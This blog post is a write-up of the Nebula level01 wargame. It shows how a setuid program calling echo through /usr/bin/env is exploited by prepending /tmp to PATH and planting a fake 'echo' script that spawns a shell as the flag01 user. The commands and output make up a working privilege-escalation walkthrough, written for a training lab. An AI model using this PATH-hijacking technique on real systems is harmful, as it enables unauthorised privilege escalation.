my infosec notes

my personal collection of infosec tips and tricks

Home Archive About Feed
2018-05-27

exploit-exercises.com - nebula - level01

by palaziv

Back

In the second nebula level we need to find and exploit a vulnerability in the program below:

 
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

The last line is interesting. Instead of calling just echo and now what? the program runs the command through /usr/bin/env which means that it will run whatever the default version of echo is in the current environment or to be more precisely, the first echo executable that appears in the user’s $PATH.

Let’s check our $PATH:

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

So first it will look for the echo program in /usr/local/sbin, then in /usr/local/bin and so on. Now if we change the $PATH variable and introduce a path where we place a file called echo then this file will be executed!

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ PATH=/tmp:$PATH
level01@nebula:~$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Let’s place the bash program in /tmp and rename it to echo:

level01@nebula:/home/flag01$ whereis bash
bash: /bin/bash /etc/bash.bashrc /usr/share/man/man1/bash.1.gz
level01@nebula:/home/flag01$ cp /bin/bash /tmp/
level01@nebula:/home/flag01$ ls -l /tmp/
total 904
-rwxr-xr-x 1 level01 level01 916692 2018-05-27 01:11 bash
level01@nebula:/home/flag01$ mv /tmp/bash /tmp/echo
level01@nebula:/home/flag01$ ls -l /tmp/
total 904
-rwxr-xr-x 1 level01 level01 916692 2018-05-27 01:11 echo

Now if we run the flag01 program our fake echo command will run and we will have a new shell which runs with the rights of the owner of the flag01 program:

level01@nebula:/home/flag01$ ./flag01 
echo: and: No such file or directory

What happened here? The program tries to call echo (now bash) with the arguments and now what?. From man bash: If arguments remain after option processing, and neither the -c nor the -s option has been supplied, the first argument is assumed to be the name of a file containing shell commands. If bash is invoked in this fashion, $0 is set to the name of the file, and the positional parameters are set to the remaining arguments. Bash reads and executes commands from this file, then exits. Bash’s exit status is the exit sta‐tus of the last command executed in the script. If no commands are executed the exit status is 0. An attempt is first made to open the file in the current directory, and, if no file is found, then the shell searches the directories in PATH for the script. We have to find a way to ignore these arguments. Let’s write a simple script which opens a new shell and ignores and now what?:

#!/bin/bash
bash

Save this in a file called echo under /tmp, make it executable and run the program again:

level01@nebula:/home/flag01$ ls -l /tmp/
total 4
-rw-rw-r-- 1 level01 level01 17 2018-05-27 02:01 echo
level01@nebula:/home/flag01$ chmod +x /tmp/echo 
level01@nebula:/home/flag01$ ls -l /tmp/
total 4
-rwxrwxr-x 1 level01 level01 17 2018-05-27 02:01 echo
level01@nebula:/home/flag01$ cat /tmp/echo 
#!/bin/bash
bash
level01@nebula:/home/flag01$ ./flag01 
flag01@nebula:/home/flag01$ whoami
flag01

Success! Now let’s grab the flag:

flag01@nebula:/home/flag01$ getflag 
You have successfully executed getflag on a target account
Back